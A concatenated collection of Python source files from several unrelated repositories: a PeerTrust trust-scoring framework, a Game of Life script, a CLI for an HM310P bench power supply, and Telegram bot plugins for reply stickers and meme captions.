offer_reputation = self.offerReputation(consideredOffers, totalOffers, consideredOfferLocation, totalOfferLocation, managedOfferViolations, predictedOfferViolations, executedOfferViolations, nonPredictedOfferViolations)
offer_satisfaction = self.offerSatisfaction(trustorDID, trusteeDID, offerDID, offer_reputation)
information["trustor"]["direct_parameters"]["providerSatisfaction"] = provider_satisfaction
ps_weighting = round(random.uniform(0.4, 0.6),2)
information["trustor"]["direct_parameters"]["PSWeighting"] = ps_weighting
information["trustor"]["direct_parameters"]["offerSatisfaction"] = offer_satisfaction
os_weighting = 1-ps_weighting
information["trustor"]["direct_parameters"]["OSWeighting"] = os_weighting
information["trustor"]["direct_parameters"]["providerReputation"] = provider_reputation
information["trustor"]["direct_parameters"]["offerReputation"] = offer_reputation
information["trustor"]["direct_parameters"]["availableAssets"] = availableAssets
information["trustor"]["direct_parameters"]["totalAssets"] = totalAssets
information["trustor"]["direct_parameters"]["availableAssetLocation"] = availableAssetLocation
information["trustor"]["direct_parameters"]["totalAssetLocation"] = totalAssetLocation
information["trustor"]["direct_parameters"]["managedViolations"] = managedViolations
information["trustor"]["direct_parameters"]["predictedViolations"] = predictedViolations
information["trustor"]["direct_parameters"]["executedViolations"] = executedViolations
information["trustor"]["direct_parameters"]["nonPredictedOfferViolations"] = nonPredictedViolations
information["trustor"]["direct_parameters"]["consideredOffers"] = consideredOffers
information["trustor"]["direct_parameters"]["totalOffers"] = totalOffers
information["trustor"]["direct_parameters"]["consideredOfferLocation"] = consideredOfferLocation
information["trustor"]["direct_parameters"]["totalOfferLocation"] = totalOfferLocation
information["trustor"]["direct_parameters"]["managedOfferViolations"] = managedOfferViolations
information["trustor"]["direct_parameters"]["predictedOfferViolations"] = predictedOfferViolations
information["trustor"]["direct_parameters"]["executedOfferViolations"] = executedOfferViolations
information["trustor"]["direct_parameters"]["nonPredictedOfferViolations"] = nonPredictedOfferViolations
#information["trustor"]["direct_parameters"]["feedbackNumber"] = nonPredictedViolations
#information["trustor"]["direct_parameters"]["feedbackOfferNumber"] = nonPredictedViolations
#information["trustor"]["direct_parameters"]["location"] = nonPredictedViolations
#information["trustor"]["direct_parameters"]["validFor"] = nonPredictedViolations
information["trustor"]["indirect_parameters"]["recommendation_weighting"] = 1-direct_weighting
information["trustee"]["trusteeDID"] = trusteeDID
information["trustee"]["offerDID"] = offerDID
information["trustee"]["trusteeSatisfaction"] = self.getTrusteeSatisfactionDLT(trusteeDID)
information["trustor"]["direct_parameters"]["userSatisfaction"] = self.satisfaction(ps_weighting, os_weighting, provider_satisfaction, offer_satisfaction)
information["trust_value"] = round(information["trustor"]["direct_parameters"]["direct_weighting"]*(information["trustee"]["trusteeSatisfaction"]*information["trustor"]["credibility"]*information["trustor"]["transactionFactor"])+information["trustor"]["indirect_parameters"]["recommendation_weighting"]*information["trustor"]["communityFactor"],3)
if information not in self.historical:
self.historical.append(information)
data = {"trustorDID": trustorDID, "trusteeDID": trusteeDID, "offerDID": offerDID,
"userSatisfaction": information["trustor"]["direct_parameters"]["userSatisfaction"],
"interactionNumber": information["trustor"]["direct_parameters"]["interactionNumber"],
"totalInteractionNumber": information["trustor"]["direct_parameters"]["totalInteractionNumber"],
"currentInteractionNumber": information["currentInteractionNumber"]}
with open(self.dlt_file_name, 'a', encoding='UTF8', newline='') as dlt_data:
writer = csv.DictWriter(dlt_data, fieldnames=self.dlt_headers)
writer.writerow(data)
return data
def setTrusteeInteractions(self, producer, consumer, trusteeDID, interactions):
""" This method introduces interactions to the DLT in order to avoid a cold start of all system """
for i in range(interactions):
availableAssets = randint(2,10)
totalAssets = availableAssets + randint(0,2)
availableAssetLocation = randint(1,6)
totalAssetLocation = availableAssetLocation + randint(0,2)
managedViolations = randint(10,25)
predictedViolations = managedViolations + randint(0,3)
executedViolations = randint(0,3)
nonPredictedViolations = randint(0,4)
consideredOffers = randint(2,10)
totalOffers = consideredOffers + randint(0,2)
consideredOfferLocation = randint(1,6)
totalOfferLocation = consideredOfferLocation + randint(0,2)
managedOfferViolations = randint(10,25)
predictedOfferViolations = managedOfferViolations + randint(0,3)
executedOfferViolations = randint(0,3)
nonPredictedOfferViolations = randint(0,4)
self.generateTrusteeInformation(producer, consumer, trusteeDID, availableAssets, totalAssets, availableAssetLocation, totalAssetLocation, managedViolations, predictedViolations, executedViolations, nonPredictedViolations, consideredOffers, totalOffers, consideredOfferLocation, totalOfferLocation, managedOfferViolations, predictedOfferViolations, executedOfferViolations, nonPredictedOfferViolations)
def getLastHistoryTrustValue(self, trustorDID, trusteeDID):
""" This method retrieves the last trust score that a trustor has stored about a trustee in its historical"""
global consumer
trust_information = self.consumer.readLastTrustValue(self.historical, trustorDID, trusteeDID)
if bool(trust_information):
last_truste_value = trust_information["trust_value"]
return last_truste_value
else:
"""In this case, Trustor didn't have an interaction with Trustee and
the provider recommendation is based on the last interaction registered in the DLT"""
return 1
def getLastOfferHistoryTrustValue(self, trustorDID, trusteeDID, offerDID):
""" This method retrieves the last trust score that a trustor has stored about an offer trustee
in its historical"""
global consumer
trust_information = self.consumer.readLastTrustValueOffer(self.historical, trustorDID, trusteeDID, offerDID)
if bool(trust_information):
last_truste_value = trust_information["trust_value"]
return last_truste_value
else:
"""In this case, Trustor didn't have an interaction with Trustee and
the provider recommendation is based on the last interaction registered in the DLT"""
return 1
def getOfferFeedbackNumberDLT(self, trusteeDID, offerDID):
""" This method counts the number of feedbacks registered in the DLT for a particular offer """
counter = 0
""" Check that the last recommender is not ourselves"""
list_interactions = self.find_by_column(self.dlt_file_name, 'trusteeDID', trusteeDID)
""" Check the number of interactions whose offerID is the same"""
for interaction in list_interactions:
if interaction["offerDID"] == offerDID:
counter+=1
return counter
def getTrusteeFeedbackNumberDLT(self, trusteeDID):
""" This method counts the number of feedbacks registered in the DLT for a particular trustee """
""" Check that the last recommender is not ourselves"""
return len(self.find_by_column(self.dlt_file_name, 'trusteeDID', trusteeDID))
def getTrustworthyRecommendationDLT(self, trustorDID, trusteeDID, trustworthy_recommender_list):
""" This method returns from a trusted list those recommender that have interacted with the trustor """
trustworthy_recommendations = []
list_interactions = self.find_by_column(self.dlt_file_name, 'trusteeDID', trusteeDID)
""" Starting from the end to identify the last recommender"""
for interaction in reversed(list_interactions):
""" We obtain the latest trust value from our reliable recommenders on the trustor giving
the highest weight to the final recommendations."""
if interaction['trustorDID'] != trustorDID and interaction['trustorDID'] in trustworthy_recommender_list:
trustworthy_recommendations.append(interaction['trustorDID'])
trustworthy_recommender_list.remove(interaction['trustorDID'])
return trustworthy_recommendations
def getLastCredibility(self, trustorDID, trusteeDID):
""" This method recovers the last credibility value registered in the DLT for a particular trustee"""
global consumer
trust_information = self.consumer.readLastTrustValue(self.historical, trustorDID, trusteeDID)
if bool(trust_information):
last_credibility = trust_information["credibility"]
return last_credibility
else:
"""In this case, Trustor didn't have an credibility with Trustee and
the provider recommendation is based on the last history value registered in its Kafka topic"""
return 1
def getTrustorInteractions(self, trustorDID):
""" This methods return all trustor's interactions registered in the DLT"""
trustee_interactions = []
list_trustor_interactions = self.find_by_column(self.dlt_file_name, 'trustorDID', trustorDID)
for interaction in list_trustor_interactions:
trustee_interactions.append(interaction["trusteeDID"])
return trustee_interactions
def getTrusteeInteractions(self, trustorDID, trusteeDID):
""" This methods return all entities that have interacted with a trustee and
have published feedbacks in the DLT"""
interactions = []
list_interactions = self.find_by_column(self.dlt_file_name, 'trusteeDID', trusteeDID)
for interaction in list_interactions:
if interaction["trustorDID"] != trustorDID:
interactions.append(interaction["trustorDID"])
return interactions
return interactions
"""%%%%%%%%%%%%%% PEERTRUST EQUATIONS %%%%%%%%%%%%%%%%%"""
def credibility(self, trustorDID, trusteeDID):
previous_trustor_interactions = self.getTrustorInteractions(trustorDID)
similarity_summation = 0.0
summation_counter = 0
if previous_trustor_interactions:
for previous_interaction in previous_trustor_interactions:
summation_counter = summation_counter + 1
similarity_summation = similarity_summation + self.similarity(previous_interaction)
else:
similarity_summation = 1
summation_counter = 1
trustee_similarity = self.similarity(trusteeDID)
credibility = trustee_similarity/(similarity_summation/summation_counter)
if credibility > 1.0:
credibility = (similarity_summation/summation_counter)/trustee_similarity
return round(credibility, 3)
def similarity(self, trusteeDID):
""" This method identifies stakeholders who have evaluated one or more entities in common with the trustor
(trustee parameter) to compare their satisfaction values and determine how credible the trustor's
(trustee parameter) satisfaction value is """
common_interaction = []
trustor_interaction_list = self.getTrustorInteractions(trusteeDID)
for interaction in trustor_interaction_list:
common_interaction = self.getTrusteeInteractions(trusteeDID, interaction)
if common_interaction:
""" Currently, only one common interaction is contemplated """
break
common_interaction_list = self.getTrustorInteractions(common_interaction[0])
IJS_counter = 0
global_satisfaction_summation = 0.0
for interaction in trustor_interaction_list:
if interaction in common_interaction_list:
trustor_satisfaction_summation = self.consumer.readSatisfactionSummation(self.historical, trusteeDID, interaction)
common_interaction_satisfaction_summation = self.consumer.readSatisfactionSummation(self.historical, common_interaction[0], interaction)
satisfaction_summation = pow((trustor_satisfaction_summation - common_interaction_satisfaction_summation), 2)
global_satisfaction_summation = global_satisfaction_summation + satisfaction_summation
IJS_counter = IJS_counter + 1
final_similarity = 1 - math.sqrt(global_satisfaction_summation/IJS_counter)
return final_similarity
def communityContextFactor(self, trustorDID, trusteeDID):
""" Static list of recommender based on the domains registered in the DLT. TODO dynamic """
global consumer
trustworthy_recommender_list = self.list_additional_did_providers[:]
total_registered_trustee_interaction = self.consumer.readTrusteeInteractions(self.historical, trusteeDID)
number_trustee_feedbacks_DLT = self.getTrusteeFeedbackNumberDLT(trusteeDID)
trustee_interaction_rate = number_trustee_feedbacks_DLT / total_registered_trustee_interaction
if trustorDID in trustworthy_recommender_list:
trustworthy_recommender_list.remove(trustorDID)
trustworthy_recommendations = self.getTrustworthyRecommendationDLT(trustorDID, trusteeDID, trustworthy_recommender_list)
summation_trustworthy_recommendations = 0.0
for recommender in trustworthy_recommendations:
last_value = self.getLastHistoryTrustValue(recommender, trusteeDID)
last_credibility = self.getLastCredibility(trustorDID, recommender)
summation_trustworthy_recommendations = summation_trustworthy_recommendations + (last_credibility*last_value)
return round((trustee_interaction_rate+(summation_trustworthy_recommendations/len(trustworthy_recommendations)))/2,3)
def communityContextFactor2(self, trustorDID, trusteeDID):
""" This method displays the recommender on the screen and we have changed the parameters of the
getLastCredibility, the only difference being """
global consumer
trustworthy_recommender_list = self.list_additional_did_providers[:]
total_registered_trustee_interaction = self.consumer.readTrusteeInteractions(self.historical, trusteeDID)
number_trustee_feedbacks_DLT = self.getTrusteeFeedbackNumberDLT(trusteeDID)
trustee_interaction_rate = number_trustee_feedbacks_DLT / total_registered_trustee_interaction
if trustorDID in trustworthy_recommender_list:
trustworthy_recommender_list.remove(trustorDID)
trustworthy_recommendations = self.getTrustworthyRecommendationDLT(trustorDID, trusteeDID, trustworthy_recommender_list)
summation_trustworthy_recommendations = 0.0
print("\n\tComputing community factor:")
for recommender in trustworthy_recommendations:
print("\n\tRecommendation from ", recommender, " over ", trusteeDID, " to calculate the community factor")
last_value = self.getLastHistoryTrustValue(recommender, trusteeDID)
print("\tLast trust score of ", recommender, " on ", trusteeDID, " was ---> ",last_value)
last_credibility = self.getLastCredibility(trustorDID, recommender)
print("\tCredibility of ",trustorDID," on the recommender (", recommender, ") --->", round(last_credibility, 3), "\n")
summation_trustworthy_recommendations = summation_trustworthy_recommendations + (last_credibility*last_value)
return round((trustee_interaction_rate+(summation_trustworthy_recommendations/len(trustworthy_recommendations)))/2,3)
def transactionContextFactor(self, trustorDID, trusteeDID, offerDID):
global consumer
""" Currently, only one time-window is contemplated """
total_registered_trustee_interaction = self.consumer.readTrusteeInteractions(self.historical, trusteeDID)
total_registered_offer_interactions = self.consumer.readOfferTrusteeInteractions(self.historical, trusteeDID, offerDID)
number_offer_trustee_feedbacks_DLT = self.getOfferFeedbackNumberDLT(trusteeDID, offerDID)
number_trustee_feedbacks_DLT = self.getTrusteeFeedbackNumberDLT(trusteeDID)
transactionFactor = (number_offer_trustee_feedbacks_DLT / total_registered_offer_interactions + number_trustee_feedbacks_DLT / total_registered_trustee_interaction)/2
return round(transactionFactor, 3)
def satisfaction(self, PSWeighting, OSWeighting, providerSatisfaction, offerSatisfaction):
return PSWeighting*providerSatisfaction + OSWeighting*offerSatisfaction
def providerSatisfaction(self, trustorDID, trusteeDID, providerReputation):
""" This method computes the Provider's satisfaction considering its reputation and recommendations"""
""" Only one recommendation is currently contemplated"""
last_interaction = self.getRecommenderDLT(trustorDID, trusteeDID)
provider_recommendation = self.getLastRecommendationValue(last_interaction)
""" We obtain our last trust value on the recommender from our Kafka topic """
last_trust_score_recommender = self.getLastHistoryTrustValue(trustorDID, last_interaction['trustorDID'])
provider_satisfaction = round((providerReputation + provider_recommendation * last_trust_score_recommender)/2, 3)
return provider_satisfaction
def providerReputation(self, availableAssets, totalAssets, availableAssetLocation, totalAssetLocation, managedViolations, predictedViolations, executedViolations, nonPredictedViolations):
""" Currently, only one time-window is contemplated"""
try:
assets_percentage = availableAssets / totalAssets
except ZeroDivisionError:
assets_percentage = 0
try:
assets_location_percentage = availableAssetLocation / totalAssetLocation
except ZeroDivisionError:
assets_location_percentage = 0
try:
managed_violations_percentage = managedViolations / predictedViolations
except ZeroDivisionError:
managed_violations_percentage = 0
try:
violations_percentage = (executedViolations + nonPredictedViolations) / predictedViolations
except ZeroDivisionError:
violations_percentage = 0
reputation = ((assets_percentage + assets_location_percentage + (2 * managed_violations_percentage) - (2 * violations_percentage)) + 2) / 6
return reputation
def offerSatisfaction(self, trustorDID, trusteeDID, offerDID, offerReputation):
""" This method computes the Provider's satisfaction considering its reputation and recommendations"""
""" Only one recommendation is currently contemplated"""
last_interaction = self.getRecommenderOfferDLT(trustorDID, trusteeDID, offerDID)
provider_recommendation = self.getLastOfferRecommendationValue(last_interaction)
""" We obtain our last trust value on the offer from our Kafka topic"""
last_trust_score_recommender = self.getLastOfferHistoryTrustValue(last_interaction['trustorDID'], trusteeDID, offerDID)
provider_satisfaction = round((offerReputation + provider_recommendation * last_trust_score_recommender)/2, 3)
return provider_satisfaction
def offerReputation(self, consideredOffers, totalOffers, consideredOfferLocation, totalOfferLocation, managedOfferViolations, predictedOfferViolations, executedOfferViolations, nonPredictedOfferViolations):
""" Currently, only one time-window is contemplated"""
try:
assets_percentage = consideredOffers / totalOffers
except ZeroDivisionError:
assets_percentage = 0
try:
assets_location_percentage = consideredOfferLocation / totalOfferLocation
except ZeroDivisionError:
assets_location_percentage = 0
try:
managed_violations_percentage = managedOfferViolations / predictedOfferViolations
except ZeroDivisionError:
managed_violations_percentage = 0
try:
violations_percentage = (executedOfferViolations + nonPredictedOfferViolations) / predictedOfferViolations
except ZeroDivisionError:
violations_percentage = 0
reputation = ((assets_percentage + assets_location_percentage + (2 * managed_violations_percentage) - (2 * violations_percentage)) + 2) / 6
return reputation
```
#### File: Trust-management-framework/peer_Trust_Model/trustInformationTemplate.py
```python
class TrustInformationTemplate():
def trustTemplate(self):
"""This methods introduces the general Trust template that will be used in order to generate a dataset,
and also to compute new trust scores and provide recomendations """
general_JSON = {
"trustor": {
"trustorDID": "string",
"trusteeDID": "string",
"credibility": "Unknown Type: double",
"transactionFactor": "Unknown Type: double",
"communityFactor": "Unknown Type: double",
"trust_propagation": True,
"trust_update": "Unknown",
"trust_evaluation": "PeerTrust",
"direct_parameters": {
"direct_weighting": "Unknown Type: double",
"userSatisfaction": "Unknown Type: double",
"providerSatisfaction": "Unknown Type: double",
"PSWeighting": "Unknown Type: double",
"offerSatisfaction": "Unknown Type: double",
"OSWeighting": "Unknown Type: double",
"providerReputation": "Unknown Type: double",
"offerReputation": "Unknown Type: double",
"availableAssets": "Unknown Type: double",
"totalAssets": "Unknown Type: double",
"availableAssetLocation": "Unknown Type: double",
"totalAssetLocation": "Unknown Type: double",
"managedViolations": "Unknown Type: double",
"predictedViolations": "Unknown Type: double",
"executedViolations": "Unknown Type: double",
"nonPredictedViolations": "Unknown Type: double",
"consideredOffers": "Unknown Type: double",
"totalOffers": "Unknown Type: double",
"consideredOfferLocation": "Unknown Type: double",
"totalOfferLocation": "Unknown Type: double",
"managedOfferViolations": "Unknown Type: double",
"predictedOfferViolations": "Unknown Type: double",
"executedOfferViolations": "Unknown Type: double",
"nonPredictedOfferViolations": "Unknown Type: double",
"interactionNumber": "int",
"totalInteractionNumber": "int",
"feedbackNumber": "int",
"feedbackOfferNumber": "int",
"location": "Unknown Type: geographicalAddress",
"validFor": "Unknown Type: timePeriod"
},
"indirect_parameters": {
"recommendation_weighting": "Unknown Type: double",
"recommendations": "Unknown Type: recommendationlist"
},
"offerDID": {
"type": "string"
}
},
"trustee": {
"trusteeDID": "string",
"recommendation": {
"recommender": "string",
"trust_level": "Unknown Type: double",
"location": "Unknown Type: geographicalAddress"
},
"offerDID": {
"type": "string"
},
"trusteeSatisfaction": "double"
},
"trust_value": "double",
"currentInteractionNumber": "int",
"evaluation_criteria": "Inter-domain",
"initEvaluationPeriod": "Unknown Type: timestamp",
"endEvaluationPeriod": "Unknown Type: timestamp"
}
return general_JSON
def trustTemplate2(self):
"""This methods introduces the general Trust template that will be used in order to generate a dataset,
and also to compute new trust scores and provide recomendations """
general_JSON = {
"trustor": {
"trustorDID": "string",
"trusteeDID": "string",
"credibility": "Unknown Type: double",
"transactionFactor": "Unknown Type: double",
"communityFactor": "Unknown Type: double",
"trust_propagation": True,
"trust_update": "Unknown",
"trust_evaluation": "PeerTrust",
"direct_parameters": {
"direct_weighting": "Unknown Type: double",
"userSatisfaction": "Unknown Type: double",
"providerSatisfaction": "Unknown Type: double",
"PSWeighting": "Unknown Type: double",
"offerSatisfaction": "Unknown Type: double",
"OSWeighting": "Unknown Type: double",
"providerReputation": "Unknown Type: double",
"offerReputation": "Unknown Type: double",
"availableAssets": "Unknown Type: double",
"totalAssets": "Unknown Type: double",
"availableAssetLocation": "Unknown Type: double",
"totalAssetLocation": "Unknown Type: double",
"managedViolations": "Unknown Type: double",
"predictedViolations": "Unknown Type: double",
"executedViolations": "Unknown Type: double",
"nonPredictedViolations": "Unknown Type: double",
"consideredOffers": "Unknown Type: double",
"totalOffers": "Unknown Type: double",
"consideredOfferLocation": "Unknown Type: double",
"totalOfferLocation": "Unknown Type: double",
"managedOfferViolations": "Unknown Type: double",
"predictedOfferViolations": "Unknown Type: double",
"executedOfferViolations": "Unknown Type: double",
"nonPredictedOfferViolations": "Unknown Type: double",
"interactionNumber": "int",
"totalInteractionNumber": "int",
"feedbackNumber": "int",
"feedbackOfferNumber": "int",
"location": "Barcelona, Spain",
},
"indirect_parameters": {
"recommendation_weighting": "Unknown Type: double",
},
"offerDID": {
"type": "string"
}
},
"trustee": {
"trusteeDID": "string",
"offerDID": {
"type": "string"
},
"trusteeSatisfaction": "double"
},
"trust_value": "double",
"currentInteractionNumber": "int",
"evaluation_criteria": "Inter-domain",
"initEvaluationPeriod": "Unknown Type: timestamp",
"endEvaluationPeriod": "Unknown Type: timestamp"
}
return general_JSON
def trustTemplate3(self):
"""This methods introduces the general Trust template that will be used for MongoDB in order to retrieve objects
with the fields ordered """
general_JSON = {
"trustor": {
"trustorDID": 1,
"trusteeDID": 1,
"credibility": 1,
"transactionFactor": 1,
"communityFactor": 1,
"trust_propagation": 1,
"trust_update": 1,
"trust_evaluation": 1,
"direct_parameters": {
"direct_weighting": 1,
"userSatisfaction": 1,
"providerSatisfaction": 1,
"PSWeighting": 1,
"offerSatisfaction": 1,
"OSWeighting": 1,
"providerReputation": 1,
"offerReputation": 1,
"availableAssets": 1,
"totalAssets": 1,
"availableAssetLocation": 1,
"totalAssetLocation": 1,
"managedViolations": 1,
"predictedViolations": 1,
"executedViolations": 1,
"nonPredictedViolations": 1,
"consideredOffers": 1,
"totalOffers": 1,
"consideredOfferLocation": 1,
"totalOfferLocation": 1,
"managedOfferViolations": 1,
"predictedOfferViolations": 1,
"executedOfferViolations": 1,
"nonPredictedOfferViolations": 1,
"interactionNumber": 1,
"totalInteractionNumber": 1,
"feedbackNumber": 1,
"feedbackOfferNumber": 1,
"location": 1,
"validFor": 1
},
"indirect_parameters": {
"recommendation_weighting": 1,
"recommendations": 1
},
"offerDID": {
"type": 1
}
},
"trustee": {
"trusteeDID": 1,
"recommendation": {
"recommender": 1,
"trust_level": 1,
"location": 1
},
"offerDID": {
"type": 1
},
"trusteeSatisfaction": 1
},
"trust_value": 1,
"currentInteractionNumber": 1,
"evaluation_criteria": 1,
"initEvaluationPeriod": 1,
"endEvaluationPeriod": 1
}
return general_JSON
``` |
{
"source": "5h00T/LifeGame_py",
"score": 4
} |
#### File: 5h00T/LifeGame_py/LifeGame.py
```python
class Cell():
def __init__(self, alive):
self.alive = alive
def LifeGameInit(cells_per_line, alive_probability):
"""
Parameters
----------
cells_per_line : int
一列当たりのセルの数
alive_probability : float
生存セルの確率
Returns
--------
cells : list[sells_per_line+2][sells_per_line+2]
Cellクラスのリスト
"""
import random
return [[Cell(True if (random.random() < alive_probability and not (col == 0 or row == 0 or col == cells_per_line+1 or row == cells_per_line+1 )) else False) for col in range(cells_per_line+2)] for row in range(cells_per_line+2)]
def UpdateCellStatus(cells, cells_per_line):
"""
セルの状態を更新する
Parameters
----------
cells : list
更新する細胞
cells_per_line : int
一列当たりのセルの数
Returns
-------
new_cells : list
更新後の細胞
"""
import copy
new_sells = copy.deepcopy(cells)
# ダミーのマスで囲まれているので添字は1から
for col in range(1, cells_per_line+1):
for row in range(1, cells_per_line+1):
alive_cells = 0
for i in range(-1, 2):
for j in range(-1, 2):
if cells[col+i][row+j].alive == True and not (i == 0 and j == 0):
alive_cells += 1
if alive_cells == 3 and cells[col][row].alive == False:
new_sells[col][row].alive = True
elif alive_cells <= 1 or alive_cells >= 4:
new_sells[col][row].alive = False
return new_sells
def print_cells(cells, alive_cell="■", dead_cell="□"):
"""
セルの状態を出力する
"""
for i in cells[1:-1]:
for j in i[1:-1]:
print(alive_cell if j.alive else dead_cell, end="")
print() # 改行
if __name__=="__main__":
import time
import subprocess
cells_per_line = 50
alive_probalility = 0.5
cells = LifeGameInit(cells_per_line, alive_probalility)
while True:
subprocess.call("clear")
print_cells(cells, "o", "M")
time.sleep(1)
cells = UpdateCellStatus(cells, cells_per_line)
``` |
{
"source": "5H3LL3H5/hm310p",
"score": 2
} |
#### File: src/hm310p_cli/console.py
```python
import click
# project imports
from . import __version__
from .hm310p import HM310P
from .hm310p_constants import PowerState
iMinA = 0.0
iMaxA = 10.0
uMinV = 0.0
uMaxV = 32.0
@click.command()
@click.option("-p", "--port", type=str, help="Serial device", required=True)
@click.option(
"-s",
"--powerstate",
type=click.Choice(["on", "off"], case_sensitive=False),
help="Power supply switch",
required=True,
)
@click.option(
"-V",
"--vout",
type=click.FloatRange(uMinV, uMaxV),
help="Output voltage in Volt",
required=True,
)
@click.option(
"--ovp",
type=click.FloatRange(uMinV, uMaxV),
help="Over voltage protection value in Volt",
required=False,
)
@click.option(
"-I",
"--iout",
type=click.FloatRange(iMinA, iMaxA),
help="Output current in Ampere",
required=True,
)
@click.option(
"--ocp",
type=click.FloatRange(iMinA, iMaxA),
help="Over current protection value in Ampere",
required=False,
)
@click.option("-D", "--debug", is_flag=True)
@click.version_option(version=__version__)
def main(
port: str,
powerstate: str,
vout: float,
ovp: float,
iout: float,
ocp: float,
debug: bool,
) -> None:
"""The hm310p command line interface"""
adaptedOVP = ""
adaptedOCP = ""
if ovp is None:
"""ovp value five percent higher than vout value"""
ovp = 1.05 * vout
adaptedOVP = " => OVP not given, set 5% larger than Vout"
if ovp > uMaxV:
ovp = uMaxV
adaptedOVP = f" => OVP not given, clipped to {uMaxV:02.3f} V"
if ocp is None:
"""ocp value five percent higher than iout value"""
ocp = 1.05 * iout
adaptedOCP = " => OCP not given, set 5% larger than Iout"
if ocp > iMaxA:
ocp = iMaxA
adaptedOCP = f" => OCP not given, clipped to {iMaxA:02.3f} A"
if ovp < vout:
raise click.BadOptionUsage("ovp", f"OVP={ovp:02.3f} V < Vout={vout:02.3f} V")
if ocp < iout:
raise click.BadOptionUsage("ocp", f"OCP={ocp:02.3f} A < Iout={iout:02.3f} A")
if debug:
click.secho("Welcome to the hm310p command line interface.", fg="green")
click.echo(f"Port\t\t: {port}")
click.echo(f"Powerstate\t: {powerstate}")
click.echo(f"Vout\t\t: {vout:02.3f} V")
click.echo(f"OVP\t\t: {ovp:02.3f} V" + adaptedOVP)
click.echo(f"Iout\t\t: {iout:02.3f} A")
click.echo(f"OCP\t\t: {ocp:02.3f} A" + adaptedOCP)
psupply = HM310P(port, 1)
if powerstate == "on":
psupply.set_opp()
print(f"OPP: {psupply.get_opp():2.3f}")
# Iocp = 0.750 A, Iout = 0.5 A, Uout = 24 V, Uovp = 24.05 V
psupply.set_ocp(ocp)
psupply.set_current(iout)
psupply.set_ovp(ovp)
psupply.set_voltage(vout, "Preset")
psupply.get_voltage("Output")
psupply.get_voltage("Protection")
psupply.set_opp(iout * vout)
print(f"OPP CONSOLE: {psupply.get_opp():2.3f}")
psupply.set_powerstate(PowerState.On)
psupply.set_voltage_and_current_of_channel_list(
["Output", "Preset", "Protection", "M1", "M2", "M3", "M4", "M5", "M6"],
10.10,
5.555,
)
else:
psupply.set_voltage(0)
psupply.set_current(0)
psupply.set_powerstate(PowerState.Off)
``` |
{
"source": "5h4d0w4rt/cotd-telegram-bot",
"score": 2
} |
#### File: cotd/plugins/cringer.py
```python
import functools
import random
import typing
import telegram
import telegram.ext
from cotd.cacher import MediaCache
from cotd.plugins.helpers import cacheable_handler, is_reply, logged_context
from cotd.static import StaticReader
@logged_context
def iscringe(
update: telegram.Update,
context: telegram.ext.CallbackContext,
cache: typing.Type[MediaCache] = None,
data: typing.Type[StaticReader] = None,
) -> telegram.Message:
if not is_reply(update):
return context.bot.send_message(
chat_id=update.effective_chat.id,
text='Can"t see cringe though, reply to a cringe post',
)
@functools.partial(cacheable_handler, key="<KEY>", path="video.file_id")
@logged_context
def _process_based(
update: telegram.Update,
context: telegram.ext.CallbackContext,
cache: typing.Type[MediaCache] = None,
data: typing.Type[StaticReader] = None,
) -> telegram.Message:
return context.bot.send_video(
chat_id=update.effective_chat.id,
reply_to_message_id=update.message.reply_to_message.message_id,
video=cache.ribnikov or data.ribnikov,
)
@functools.partial(cacheable_handler, key="sniff_dog", path="photo[0].file_id")
@logged_context
def _process_cringe(
update: telegram.Update,
context: telegram.ext.CallbackContext,
cache: typing.Type[MediaCache] = None,
data: typing.Type[StaticReader] = None,
) -> telegram.Message:
return context.bot.send_photo(
chat_id=update.effective_chat.id,
reply_to_message_id=update.message.reply_to_message.message_id,
photo=cache.sniff_dog or data.sniff_dog,
)
choice_map = {"based": _process_based, "cringe": _process_cringe}
return choice_map[random.choice(["based", "cringe"])](update, context, cache=cache, data=data)
```
#### File: cotd/plugins/helpers.py
```python
import functools
import logging
import telegram
import telegram.ext
import logging
import typing
import io
from PIL import Image, ImageDraw, ImageFont
def logged_context(f):
@functools.wraps(f)
def wrapper(*args, **kwargs):
old_factory = logging.getLogRecordFactory()
def _record_factory(*args, **kwargs):
"""Make function print wrapped function's name instead of a wrapper"""
record = old_factory(*args, **kwargs)
record.funcName = f.__name__
return record
dispatcher: telegram.ext.Dispatcher = args[1].dispatcher
logging.setLogRecordFactory(_record_factory)
dispatcher.logger.debug(args)
dispatcher.logger.debug(kwargs)
dispatcher.logger.debug(dispatcher.bot_data)
dispatcher.logger.debug(dispatcher.chat_data)
dispatcher.logger.debug(dispatcher.user_data)
result = f(*args, **kwargs)
dispatcher.logger.debug(f"{f.__name__} : {result}")
logging.setLogRecordFactory(old_factory)
return result
return wrapper
def cacheable_handler(f, key: typing.Any, path: str):
@functools.wraps(f)
def wrapper(*args, **kwargs):
if "cache" not in kwargs:
return f(*args, **kwargs)
cache = kwargs["cache"]
result = f(*args, **kwargs)
if not cache.key:
setattr(cache, key, functools.reduce(getattr, path.split("."), result))
return result
return wrapper
def is_reply(update: telegram.Update):
try:
update.message.reply_to_message.message_id
except AttributeError:
return False
else:
return True
# TODO: fontsize for small text
def make_image(image, text: str, pos: str) -> io.BytesIO:
width, heigh = 0, 0 # init
fontsize = 10 # starting font size
img_fraction = 0.50 # portion of image width you want text width to be
font = ImageFont.truetype("static/lobster.ttf", fontsize, encoding="unic")
while font.getsize(text)[0] < img_fraction * image.size[0]:
# iterate until the text size is just larger than the criteria
fontsize += 1
font = ImageFont.truetype("static/lobster.ttf", fontsize, encoding="unic")
image_editable = ImageDraw.Draw(image)
W, H = image.size
w, h = image_editable.textsize(text, font)
if pos == "bottom":
width = (W - w) / 2
heigh = (H - h) / 1.01
else:
width = (W - w) / 2
heigh = h / 5
# some color const
# TODO: move out to const
msg_color = "#FFFFFF"
shadow_color = "#121212"
# add shadow
image_editable.text((width - 2, heigh), text, font=font, fill=shadow_color)
image_editable.text((width + 2, heigh), text, font=font, fill=shadow_color)
image_editable.text((width, heigh - 2), text, font=font, fill=shadow_color)
image_editable.text((width, heigh + 2), text, font=font, fill=shadow_color)
# add text
image_editable.text((width, heigh), text, font=font, fill=msg_color)
# fake save
bio = io.BytesIO()
bio.name = "image.jpeg"
image.save(bio, "JPEG")
bio.seek(0)
return bio
```
#### File: cotd/plugins/motivationv2.py
```python
import io
import typing
import uuid
import ratelimit
import telegram
import telegram.ext
from cotd.plugins.helpers import make_image
from PIL import Image
ONE_SECOND = 1
def motivation_inline(
update: telegram.Update, context: telegram.ext.CallbackContext
) -> telegram.InlineQueryResultCachedPhoto:
db = context.dispatcher._cotd_db
query = update.inline_query.query
if query == "":
return
motivation_image = make_image(Image.open("static/motivator.jpg"), query, "top")
msg = context.bot.send_photo(
chat_id=db,
photo=motivation_image,
)
photo_id = msg.photo[0].file_id
